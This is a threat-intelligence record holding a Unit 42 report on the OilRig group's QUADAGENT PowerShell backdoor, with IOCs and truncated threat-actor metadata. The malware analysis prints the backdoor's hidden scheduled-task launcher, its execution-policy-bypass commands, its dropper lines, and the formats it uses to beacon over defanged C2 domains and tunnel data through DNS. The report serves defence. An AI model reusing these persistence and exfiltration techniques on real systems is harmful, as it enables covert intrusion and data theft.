{ "id": "e39296d3-8953-4123-bbd0-3c0fb1bdb26b", "created_at": "2026-04-06T00:21:11.915557Z", "updated_at": "2026-04-10T03:37:50.599108Z", "deleted_at": null, "sha1_hash": "85717db1d1ee235746fab628aecc468a0ca8cd8a", "title": "OilRig Targets Technology Service Provider and Government Agency with QUADAGENT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 602562, "plain_text": "OilRig Targets Technology Service Provider and Government Agency\r\nwith QUADAGENT\r\nBy Bryan Lee, Robert Falcone\r\nPublished: 2018-07-25 · Archived: 2026-04-05 13:00:30 UTC\r\nThe OilRig group continues to adapt their tactics and bolster their toolset with newly developed tools. The OilRig group\r\n(AKA APT34, Helix Kitten) is an adversary motivated by espionage primarily operating in the Middle East region. We first\r\ndiscovered this group in mid-2016, although it is possible their operations extends earlier than that time frame. They have\r\nshown themselves to be an extremely persistent adversary that shows no signs of slowing down. Examining their past\r\nbehaviors with current events only seems to indicate that the OilRig group’s operations are likely to accelerate even further\r\nin the near future.\r\nBetween May and June 2018, Unit 42 observed multiple attacks by the OilRig group appearing to originate from a\r\ngovernment agency in the Middle East. Based on previously observed tactics, it is highly likely the OilRig group leveraged\r\ncredential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks.\r\nThe targets in these attacks included a technology services provider as well as another government entity. Both these targets\r\nwere in the same nation-state. Further, the attacks against these targets were made to appear to have originated from other\r\nentities in the same country. However, the actual attackers themselves were outside this country and likely used stolen\r\ncredentials from the intermediary organization to carry out their attacks.\r\nThe attacks delivered a PowerShell backdoor called QUADAGENT, a tool attributed to the OilRig group by both ClearSky\r\nCyber Security and FireEye. In our own analysis, we were able to also confirm the attribution of this tool to the OilRig\r\ngroup by examining specific artifacts that were reused from tools previously used by the OilRig group in addition to tactics\r\nreused from previous attacks as well. The use of script-based backdoors is a common technique used by the OilRig group as\r\nwe have previously documented. However, packaging these scripts into a portable executable (PE) file is not a tactic we\r\nhave seen the OilRig group use frequently. Detailed analysis of QUADAGENT and its ties to Oilrig is the appendix at the\r\nend of this blog. QUADAGENT is the 12th custom built tool that Unit 42 has documented the OilRig group using for their\r\nattacks.\r\nOur analysis revealed the two QUADAGENT PE files we obtained were slightly different from each other. Primarily, one\r\nused a Microsoft .NET Framework-based dropper that also opens a decoy dialog box, which can be seen in Figure 1. The\r\nother sample was a PE file generated via a bat2exe tool.\r\n \r\nSHA256 Filename PowerShell Filename Va\r\n5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63\r\n\u003credacted\u003e\r\nTechnical\r\nServices.exe\r\nOffice365DCOMCheck.ps1 B\r\nd948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520\r\ntafahom.exe,\r\nSales\r\nModification.exe\r\nSystemDiskClean.ps1 .N\r\nTable 1. QUADAGENT PE Files\r\nThe QUADAGENT backdoors dropped onto the hosts were nearly identical to each other, with the only differences being\r\nthe command and control server (C2) and randomized obfuscation. We were also able to locate a third delivery package of\r\nthe QUADAGENT backdoor as reported by ClearSky Cyber Security. In their example, the OilRig group used a malicious\r\nmacro document to deliver the backdoor, which is a tactic much more commonly used by them.\r\nA closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the\r\nresult of using an open-source toolkit called Invoke-Obfuscation. This tool was originally intended to aid defenders in\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nPage 1 of 9\n\nsimulating obfuscated PowerShell commands to better their defenses. Invoke-Obfuscation has proven to be highly effective\r\nat obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances\r\nof evasion and as an anti-analysis tactic.\r\n  Attack Details\r\nThis latest attack consisted of three waves between May and June 2018. All three waves involved a single spear phishing\r\nemail that appeared to originate from a government agency based in the Middle East. Based on our telemetry, we have high\r\nconfidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft.\r\nIn the two waves (May 30 and June 3) against the technology services provider, the victim email addresses were not easily\r\ndiscoverable via common search engines, indicating the targets were likely part of a previously collected target list, or\r\npossibly known associates of the compromised account used to send the attack emails. The malicious attachment was a\r\nsimple PE file (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63) with the filename\r\n\u003credacted\u003e Technical Services.exe. The file appears to have been compiled using a bat2exe tool, which will take batch files\r\n(.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it.\r\nOnce the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy\r\ndialog boxes. The executable will drop the packaged QUADAGENT PowerShell script using the filename\r\nOffice365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. A\r\nscheduled task is also generated to maintain persistence of the payload. Once the QUADAGENT payload has executed, it\r\nwill use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding\r\nfallback channel if the former fails.\r\nThe wave against the government entity (June 26) also involved a simple PE file attachment (SHA256:\r\nd948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe. This PE was\r\nslightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via\r\na bat2exe tool and containing a decoy dialog box as shown in Figure 1.\r\n \r\nFigure 1. Decoy dialog box\r\nThe tactic of using a decoy dialog box is commonly used by multiple adversaries and is generally deployed as a method to\r\nreduce suspicion by the victim. In comparison to being silently run, a victim may be less suspicious of a dialog/error\r\nmessage because they are provided what appears to be a legitimate error response when attempting to open the attachment.\r\nWhen a file is silently run, because there is no response to the user’s action, a victim may be more suspicious or curious on\r\nwhat actually happened.\r\nAfter the .NET PE file has been run, we observed the same behavior as the above QUADAGENT sample of dropping a\r\nPowerShell script with the filename SystemDiskClean.ps1 alongside a VBScript file with the same name. The C2 techniques\r\nremained identical, with the only change being the server which became cpuproc[.]com.\r\nUsing rdppath[.]com as a pivot point, we collected an additional QUADAGENT sample also communicating to this C2\r\n(SHA256: d7130e42663e95d23c547d57e55099c239fa249ce3f6537b7f2a8033f3aa73de), which was first reported by\r\nClearSky Cyber Security. In contrast to the two samples used in these attacks, this one did not use a PE attachment, and\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nPage 2 of 9\n\ninstead used a Microsoft Word document containing a malicious macro as the delivery vehicle. The use of malicious macro\r\ndelivery documents is a tactic we have observed the OilRig group use repeatedly over the three years we’ve been tracking\r\nthem. The actual QUADAGENT script payload used in the ClearSky sample was exactly the same as the one we found in\r\nthe bat2exe version used against the aforementioned technical services provider. The delivery document also used a filename\r\nthat could be related to other technology services or media organizations within that same nation state, although it is\r\ninconclusive. The document also contained a lure image, similar to ones commonly found in malicious macro documents\r\nwhich ask the user to click on “Enable Content” as seen in Figure 2. Unlike many other delivery documents used by this\r\ngroup, there was no additional decoy content after the macro was enabled.\r\n \r\nFigure 2. Lure image used to entice users to enable macros\r\nUse of Open Source Tools\r\nIn an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository\r\nand allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation\r\ntechniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to\r\nascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were\r\nable to deobfuscate the PowerShell script and perform additional analysis.\r\nWe found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second\r\none changing the representation of strings in the script.\r\nInvoke-Obfuscation calls the variable obfuscation technique used by the actors to obfuscate this script Random Case + {} +\r\nTicks, which changes all variables in the script to have randomly cased characters, to be surrounded in curly braces and to\r\ninclude the tick (`) character, which is ignored in by PowerShell. Invoke-Obfuscation calls the string obfuscation used by the\r\nactors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to\r\nreconstruct strings from out of order substrings (ex. \"{1}{0}\" -f 'bar','foo').\r\nDuring our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample\r\nto confirm our analysis.  We used the two previously mentioned obfuscation options within Invoke-Obfuscation on this\r\nQUADAGENT sample, which resulted in the generation of a very similar script as the Office365DCOMCheck.ps1 and\r\nSystemDiskClean.ps1 payloads delivered in the attacks discussed in this blog. We captured the commands we ran in Invoke-Obfuscation in the animation in Figure 3 below, which visualizes the steps the threat actor may have taken to create the\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nPage 3 of 9\n\npayload delivered in this attack.\r\n \r\nFigure 3. Possible steps carried out in Invoke-Obfuscation on the QUADAGENT sample\r\nConclusion\r\nThe OilRig group continues to be a persistent adversary group in the Middle East region. While their delivery techniques are\r\nfairly simple, the various tools we have attributed as part of their arsenal reveal sophistication. In this instance, they\r\nillustrated a typical behavior of adversary groups, wherein the same tool was reused in multiple attacks, but each had enough\r\nmodifications via infrastructure change, additional obfuscation, and repackaging that each sample may appear different\r\nenough to bypass security controls. A key component to always remember is that for these type of adversary groups, they\r\nwill follow the path of least resistance in their attacks, as long as their mission directive is accomplished.\r\nPalo Alto Networks customers may learn more and are protected via the following ways:\r\nWildFire classifies QUADAGENT samples as malicious\r\nQUADAGENT C2 Domains have been classified as malicious\r\nAutoFocus customers can track QUADAGENT via its corresponding tag\r\n \r\nIOCs\r\nSHA256 Hashes\r\nQUADAGENT\r\nd948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520\r\nd7130e42663e95d23c547d57e55099c239fa249ce3f6537b7f2a8033f3aa73de\r\n5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63\r\n  ThreeDollars\r\n1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c\r\n119c64a8b35bd626b3ea5f630d533b2e0e7852a4c59694125ff08f9965b5f9cc\r\n  Domains\r\nrdppath[.]com\r\ncpuproc[.]com\r\nacrobatverify[.]com\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nPage 4 of 9\n\nFilenames\r\nOffice365DCOMCheck.ps1\r\nOffice365DCOMCheck.vbs\r\nSystemDiskClean.ps1\r\nSystemDiskClean.vbs\r\nAdobeAcrobatLicenseVerify.ps1\r\nc:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Out.jpg\r\n  Appendix\r\nQUADAGENT Relationship to Other OilRig Tools\r\nDuring our regular data gathering functions several months ago, we collected a delivery document (SHA256:\r\n1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c) that contained an at-the-time an unknown\r\npayload which would be revealed to be QUADAGENT. While we do not have data supporting targeting information or\r\ntelemetry, we know the document was created in January 2018 and likely used in an attack around that time frame. In\r\naddition, the delivery document shared metadata artifacts with the ThreeDollars delivery document (SHA256:\r\n119c64a8b35bd626b3ea5f630d533b2e0e7852a4c59694125ff08f9965b5f9cc) that OilRig used to deliver the ISMAgent\r\npayload in a targeted attack In January 2018 on a government entity in the Middle East.\r\nThe QUADAGENT payload dropped by the delivery document had the filename AdobeAcrobatLicenseVerify.ps1 and used\r\nacrobatverify[.]com\r\nfor its C2. Examining the subdomains for acrobatverify[.]com reveals three subdomains, www, resolve, and dns. The passive\r\nDNS data for the subdomains shows an IP resolution of 185.162.235[.]121 from December 2017 through January 2018.\r\nPrior to this time period, we see several subdomains of msoffice-cdn[.]com, ns1, ns2, and www also resolving to this IP.\r\nThis IP and msoffice-cdn[.]com were both previously referenced in our first report on an OilRig attack using the\r\nThreeDollars delivery document.\r\nWe used this QUADAGENT payload when testing the Invoke-Obfuscation tool mentioned in this blog. By applying two\r\nspecific obfuscation techniques within Invoke-Obfuscation, we were able to create an obfuscated PowerShell script that was\r\nvery similar to the QUADAGENT payloads delivered in the attacks discussed in this blog.\r\n  QUADAGENT Analysis\r\nThe final payload delivered in all three attack waves is a PowerShell downloader referred to by other research organizations\r\nas QUADAGENT. The downloaders in these attacks were configured to use both rdppath[.]com and cpuproc[.]com as their\r\nC2 servers. When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or\r\nDNS, each of which provide a fallback channel in that order. For instance, the downloader will first attempt to communicate\r\nwith its C2 server using an HTTPS request. If that HTTPS request is not successful, the downloader will issue an HTTP\r\nrequest. Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish\r\ncommunications. We provide more on the specific usage of these protocols as we discuss the inner workings of this malware\r\nin this section.\r\nThe downloader will use the filename of the script (ex. Office365DCOMCheck or SystemDiskClean) as the name for the\r\nscheduled task to maintain persistence on the victim host. To create the scheduled task, the PowerShell payload starts by\r\nwriting the following to a VBScript file with the same name as the task name  (ex. Office365DCOMCheck.vbs or\r\nSystemDiskClean.vbs) within the %TEMP% folder:\r\nCreateObject(\"WScript.Shell\").Run \"\" \u0026 WScript.Arguments(0) \u0026 \"\", 0, False\r\nThe scheduled task will then run every five minutes, which provides persistent execution of the downloader script. The task\r\nitself is fairly simple, calling the VBScript file which contains a PowerShell one-liner as an argument to run the\r\nQUADAGENT payload (ex. Office365DCOMCheck.ps1 and SystemDiskClean.ps1):\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nPage 5 of 9\n\nwscript.exe \"Office365DCOMCheck.vbs\" \\\"PowerShell.exe  -ExecutionPolicy bypass -WindowStyle hidden -\r\nNoProfile '\u003ccurrent PowerShell script\u003e'  \\\"\r\nAfter setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose\r\nname is the same as the scheduled task (ex. Office365DCOMCheck or SystemDiskClean), such as the following:\r\n  HKCU\\Office365DCOMCheck\r\n  The payload uses this registry key to store a session identifier unique to the compromised system, as well as a pre-shared\r\nkey used for encrypting and decrypting communications between the system and the C2 server. This registry key is empty\r\nupon the first execution of the payload. The payload will communicate with its C2 server to obtain the session ID and pre-shared key and write it to this registry key in the following format:\r\n  \u003csession id\u003e_\u003cpre-shared key\u003e\r\n  To obtain the session ID and pre-shared key, the payload will first try to contact the C2 via an HTTPS GET request to the\r\nfollowing URL:\r\n  hxxps://www.rdppath[.]com/\r\n  If the above request using HTTPS does not result in an HTTP 200 OK message or the response data has no alphanumeric\r\ncharacters, the code will attempt to communicate with the C2 server using HTTP via the following URL:\r\n  hxxp://www.rdppath[.]com/\r\n  The code to communicate with the C2 via HTTP exists within an exception handler. To trigger this, if the HTTPS requests\r\ndo not work, the payload attempts to cause an exception by dividing 1 by 0. This exception invokes the exception handler\r\ncontaining the HTTP communication code, allowing it to run.\r\nIf either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will\r\nsave to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and\r\nwill provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID\r\nparameter of the cookie.\r\nIf both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to\r\nuse DNS tunneling. To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following\r\ndomain:\r\n  mail.\u003crandom number between 100000 and 999999\u003e.\u003cc2 name\u003e\r\n  This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake.\r\nThe script gathers system specific data, such as the domain the system belongs to and the current username, that it constructs\r\nin the following format:\r\n  \u003cdomain\u003e\\\u003cusername\u003e:pass\r\n  The above string is encoded using a custom base64 encoder to strip out non-alphanumeric characters (=, / and +) from the\r\ndata and replaces them with domain safe values (01, 02 and 03 respectively).\r\n\u003cencoded system data\u003e.\u003csame random number between 100000 and 999999 above\u003e.\u003cc2 name\u003e\r\n  After obtaining a session ID and pre-shared key, the PowerShell script will continue to communicate with its C2 server to\r\nobtain data to treat as a command. The script will first attempt to communicate with the C2 server using HTTPS (HTTP if\r\nunsuccessful), which involves GET requests using the session ID within the request's cookie in the PHPSESSID field, as\r\nseen in the example GET request:\r\nGET / HTTP/1.1\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nPage 6 of 9\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/42.0.2311.135 Safari/537.36 Edge/12.246\r\nHost: www.rdppath[.]com\r\nCookie: PHPSESSID=\u003cc2 provided session id\u003e\r\nConnection: Keep-Alive\r\nIf the payload is unable to reach the C2 via HTTPS/HTTP, the payload yet again falls back to DNS tunneling. The payload\r\nwill issue a DNS query to the following domain to notify the C2 that it is about to send it data (session ID value) to it in a\r\nsubsequent query:\r\n  ns1.\u003crandom number between 100000 and 999999\u003e.\u003cc2 name\u003e\r\nThe payload does nothing with the C2 server’s response to the query. Instead, it immediately issues a query to resolve the\r\nfollowing domain, which embeds the session ID value to transmit it to the C2:\r\n  \u003cencoded session id\u003e.\u003csame random number between 100000 and 999999\u003e.\u003cc2 domain name\u003e\r\n  To transmit the data via the DNS tunneling, the C2 server will respond to the above query with an IPv6 address that\r\ncontains the number of DNS queries the payload must issue to obtain the entirety of the data from subsequent IPv6 answers.\r\nThe script will send the specified number of DNS queries using the following format, each of which the C2 will respond\r\nwith an IPv6 address that the script will treat as a string of data:\r\n  www.\u003csequence number\u003e.\u003csame random number between 100000 and 999999\u003e.\u003cc2 domain name\u003e\r\n  The payload will treat the data provided by the C2 as a message, which will have the following structure:\r\n  hello\u003cchar uuid[35]\u003e\u003cchar type[1]\u003e\u003cdata\u003e\r\n  The message will start with the string hello followed by a 35-character UUID string. The type field specifies the command\r\nthat the payload will handle. This specific variant of the payload can only handle one command type, x. The data field\r\nwithin the message is a string of custom base64 encoded data that the malware decodes using the same custom base64\r\nroutine mentioned earlier and decrypts it using AES and the pre-shared key. The x command treats the supplied data as a\r\nPowerShell script that it will write to the current PowerShell script (Office365DCOMCheck.ps1/SystemDiskClean.ps1),\r\neffectively overwriting the initial PowerShell script with a secondary payload script. Also, the x command will delete the\r\ngenerated registry key and the Office365DCOMCheck/SystemDiskClean scheduled task. It will run the newly downloaded\r\nPowerShell script by running the following command via cmd /c:\r\nwscript.exe \"Office365DCOMCheck.vbs\" \"PowerShell.exe-ExecutionPolicy bypass -WindowStyle hidden -\r\nNoProfile \u003cpath to Office365DCOMCheck.ps1 script\u003e\"\r\nThe payload will then notify the C2 it has successfully downloaded and executed the secondary PowerShell payload. It does\r\nso using either the HTTPS/HTTP or DNS channels, depending on which method is successful. The payload will construct a\r\nmessage that has the following structure that it will then send to the C2:\r\n  bye\u003cchar uuid[35]\u003ed\r\n  The message above is sent via a simple HTTPS/HTTP POST request to the C2 server. If that fails, the payload will use\r\nDNS tunneling by first issuing a DNS query to resolve the following domain to notify the C2 that the payload will send data\r\nto it in subsequent DNS queries:\r\n  ns1.\u003crandom number between 100000 and 999999\u003e.\u003cc2 name\u003e\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nPage 7 of 9\n\nThe payload will then split the message up into 60-byte chunks (only 1 in this case), which it will send to the C2 via DNS\r\nqueries to resolve domains structured as:\r\n  \u003cencoded/encrypted data of message\u003e.\u003csame random number between 100000 and 999999\u003e.\u003cc2 name\u003e\r\n  The payload will notify the C2 that it is done sending data by issuing a DNS query to resolve a domain structured as:\r\n  ns2.\u003csame random number between 100000 and 999999\u003e.\u003cc2 name\u003e\r\n  Package Comparison of the QUADAGENT Samples\r\nThe bat2exe version (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63)has a batch\r\nscript, PowerShell script, and associated file names embedded within several resources that it will decrypt using RC4 and\r\nvarious MD5 hashes for keys. The executable obtains an embedded PowerShell script, decrypts it using RC4, then\r\ndecompresses it using ZLIB, and saves the cleartext to C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Out.jpg. The batch script\r\nwill then rename Out.jpg to Office365DCOMCheck.ps1 and execute it with the following command:\r\n@shift /0\r\nrename Out.jpg Office365DCOMCheck.ps1\r\nPowerShell -exec bypass -File .\\Office365DCOMCheck.ps1\r\nThe .NET variant (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) is even simpler.\r\nThis dropper starts by displaying the dialog box in Figure 1, previously shown and discussed with the following command:\r\nInteraction.MsgBox(\"An error occurred while processing your request. code(2343)\", MsgBoxStyle.Critical, null);\r\nThe dropper then writes the content of the payload which resides as plaintext in a resource within the .NET assembly to\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\SystemDiskClean.ps1. It will then execute it as a shell object:\r\ncmd.exe /c powershell -exec bypass -file \"C:\\Users\\Administrator\\AppData\\Local\\Temp\\SystemDiskClean.ps1\"\r\nIn the malicious macro attack, the same Office365DCOMCheck.ps1 script that was used in the PE version is used as the\r\npayload. When the document is opened, a lure image as shown as seen in Figure 2 is displayed in an attempt to coerce the\r\nvictim to enable macros.\r\nWhen macros are enabled and run, the macro within the Word document searches the sections of the document to get the\r\ncontents of the header using the following piece of code:\r\nSet rng = ActiveDocument.Sections(intSection).Headers(1).Range\r\nThe code above obtains the contents of the header, which the macro will write to a file at\r\nC:\\programdata\\Office365DCOMCheck.ps1. The creator of the delivery document was able to visually hide the PowerShell\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nPage 8 of 9\n\nscript in the header by setting the text to a font size of 2 and font color of white, as seen in Figure 4.\r\nFigure 4. Hidden PowerShell script within the document's header using a small white font\r\nThis technique of hiding malicious content by using a small white font is not unique to this threat group, as we recently\r\nobserved the Sofacy group use this technique to hide DDE instructions within one of their delivery documents.\r\nSource: https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/" ], "report_names": [ "unit42-oilrig-targets-technology-service-provider-government-agency-quadagent" ], "threat_actors": [ { "id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4", "created_at": "2022-10-25T15:50:23.458833Z", "updated_at": "2026-04-10T02:00:05.419537Z", "deleted_at": null, "main_name": "APT34", "aliases": null, "source_name": "MITRE:APT34", "tools": [ "netstat", "Systeminfo", "PsExec", "SEASHARPEE", "Tasklist", "Mimikatz", "POWRUNER", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b", "created_at": "2025-08-07T02:03:24.722093Z", "updated_at": "2026-04-10T02:00:03.681914Z", "deleted_at": null, "main_name": "COBALT EDGEWATER", "aliases": [ "APT34 ", "Cold River ", "DNSpionage " ], "source_name": "Secureworks:COBALT EDGEWATER", "tools": [ "AgentDrable", "DNSpionage", "Karkoff", "MailDropper", "SideTwist", "TWOTONE" ], "source_id": "Secureworks", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", 